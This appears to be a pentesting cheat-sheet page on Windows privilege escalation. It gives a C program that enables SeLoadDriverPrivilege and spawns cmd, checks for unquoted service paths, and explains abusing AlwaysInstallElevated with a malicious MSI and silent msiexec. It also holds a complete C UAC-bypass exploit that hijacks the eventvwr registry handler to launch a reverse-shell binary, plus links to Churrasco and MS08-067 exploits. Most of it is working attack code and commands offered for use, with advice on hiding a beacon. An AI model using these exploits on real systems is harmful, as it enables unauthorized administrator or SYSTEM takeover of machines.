Windows

Table of content

Enable a disabled privilege

Any disabled privilege can be re-enabled by the user.

Import-Module ./PowerUp.ps1; EnablePrivilege -Privilege ${privilegeName}

# Import-Module ./PowerUp.ps1; EnablePrivilege -Privilege SeBackupPrivilege

The following C code can be used to enable a disabled privilege:

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>int main()
{
    TOKEN_PRIVILEGES tp;
    LUID luid;
    bool bEnablePrivilege(true);
    HANDLE hToken(NULL);
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
​
    if (!LookupPrivilegeValue(
        NULL,                       // lookup privilege on local system
        L"SeLoadDriverPrivilege",   // privilege to lookup 
        &luid))                     // receives LUID of privilege
    {
        printf("LookupPrivilegeValue error: %un", GetLastError());
        return FALSE;
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;

    if (bEnablePrivilege) {
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    }

    // Enable the privilege or disable all privileges.
    if (!AdjustTokenPrivileges(
        hToken,
        FALSE,
        &tp,
        sizeof(TOKEN_PRIVILEGES),
        (PTOKEN_PRIVILEGES)NULL,
        (PDWORD)NULL))
    {
        printf("AdjustTokenPrivileges error: %x", GetLastError());
        return FALSE;
    }
​
    system("cmd");
    return 0;
}

Unquoted services path

If a service is configured to launch a binary whose path contains space such as C:\Program Files\Directory Exemple\binary.exe without any quotes arround, Windows will try to lauch the executables locating at the following path :

C:\Program.exe
C:\Program Files\Directory.exe
C:\Program Files\Directory Exemple\binary.exe

Thus, if binaries are present in either C:\Program.exe or C:\Program Files\Directory.exe they will be launched instead of the real service binary.

This vulnerability can be checked with the following command:

# CMD only
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

The service information can be checked with:

# CMD only
sc qc ${serviceName}

# SERVICE_NAME: DusmSvc
#         TYPE               : 10  WIN32_OWN_PROCESS
#         START_TYPE         : 2   AUTO_START
#         ERROR_CONTROL      : 1   NORMAL
#         BINARY_PATH_NAME   : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
#         LOAD_ORDER_GROUP   : TDI
#         TAG                : 0
#         DISPLAY_NAME       : Data Usage
#         DEPENDENCIES       : RpcSs
#         SERVICE_START_NAME : NT Authority\LocalService

If START_TYPE is AUTO_START the service will be automaticaly launched during the boot.

To restart a service:

# CMD only
sc stop ${serviceName} && sc start ${serviceName}
net stop ${serviceName} && net start ${serviceName}

Always Install Enabled

This policy allows standard users to install applications that require access to directories and registry keys that they may not usually have permission to change. This is equivalent to grant Administrator rights to the installer process.

It can be checked on the following registry key:

HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Then, create an MSI installer with VisualStudion:

Create New Project > Setup Wizard

Keep clicking Next until the step Choose File To Include. Then add your malicious executable. Then, click Finish.

Once the project is loaded, go to View > Custom Action, right click on Install and then Add Custom Action. Double click on Applicatioin Folder and select your malicious executable and click Ok. Likewise, under Custom Action Runtime, select the appropriate plateform. It will ensure that your executable is launched when the MSI installer is run.

Then install the MSI with the following command:

msiexec /q /n /i Installer.msi

To uninstalll the MSI once the exploit has be launched, run the following command:

msiexec /q /n /uninstall Installer.msi

When this technique is used to launch a beacon, the beacon will block the Windows Installer. In this case, you should inject the beacon in another process, kill the beacon running from the Windows Installer and then uninstall the MSI package used.

UAC-bypass (WIN10)

The following executable can be used to launch a reverse shell bypassing the UAC.

// Compile on Kali with : x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Pretty standard code to recursively nuke a Reg Key
 */

int RegDelnodeRecurse (LPTSTR lpSubKey) {
    LPTSTR lpEnd;
    LONG lResult;
    DWORD dwSize = MAX_PATH;
    TCHAR szName[MAX_PATH];
    HKEY hKey;
    FILETIME ftWrite;

    lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);

    if (lResult == ERROR_SUCCESS) return 1;

    lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);

    if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;

    lpEnd    = lpSubKey + lstrlen(lpSubKey);
    *lpEnd++ = '\\';
    *lpEnd   = '\0';

    if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
        do {
            strcpy(lpEnd, szName);
            if (!RegDelnodeRecurse(lpSubKey)) break;
            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
        } while (lResult == ERROR_SUCCESS);
    }

    lpEnd--;
    *lpEnd = TEXT('\0');

    RegCloseKey(hKey);

        return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}

/*
 * Wrapper for above
 */

int RegDelnode() {
    TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile";
    return RegDelnodeRecurse(szDelKey);
}

void __c_exploitUAC() {
        char curPath[MAX_PATH], evtVwr[MAX_PATH];
        HKEY attackKey;
        SHELLEXECUTEINFO exInfo;

        /*
        curPath is the command you want to elevate.
        Below is an example that shows how to elevate
        foobar.exe sitting in the same path as this
        program.
        */

        GetCurrentDirectory(MAX_PATH, curPath);
        /*
        Set the program to execute here. It must be placed in the same directory
        */
        strcat(curPath, "\\rev_adm.exe");

        sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT"));

        if(!RegDelnode()) return;
        if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return;

        RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));

        exInfo.lpVerb       = "open";
        exInfo.lpFile       = evtVwr;
        exInfo.nShow        = 0;
        exInfo.fMask        = SEE_MASK_NOCLOSEPROCESS;
        exInfo.cbSize       = sizeof(SHELLEXECUTEINFO);
        exInfo.hwnd         = 0;
        exInfo.lpParameters = 0;
        exInfo.lpDirectory  = 0;
        exInfo.hInstApp     = 0;

        ShellExecuteEx(&exInfo);

        Sleep(5000);

        TerminateProcess(exInfo.hProcess, 0);

        RegCloseKey(attackKey);
        RegDelnode();
}

int main(int argc, char *argv[]) {
        __c_exploitUAC();
        return 0;
}

Churrasco

On Windows Server 2003 with and impersonation token privileges (Tokens kiddnapping revenge), use churrasco: https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

It will execute a given command with SYSTEM privileges.

MS08-067

On Windows XP, Windows 2000 and Windows 2003 MS08-067 can allow remote code execution. https://github.com/andyacer/ms08_067

Windows XP

SP1

Privilege escalation through upnphost and SSDPSRV

Ressources

Ressources

results matching ""

    No results matching ""

    results matching ""

      No results matching ""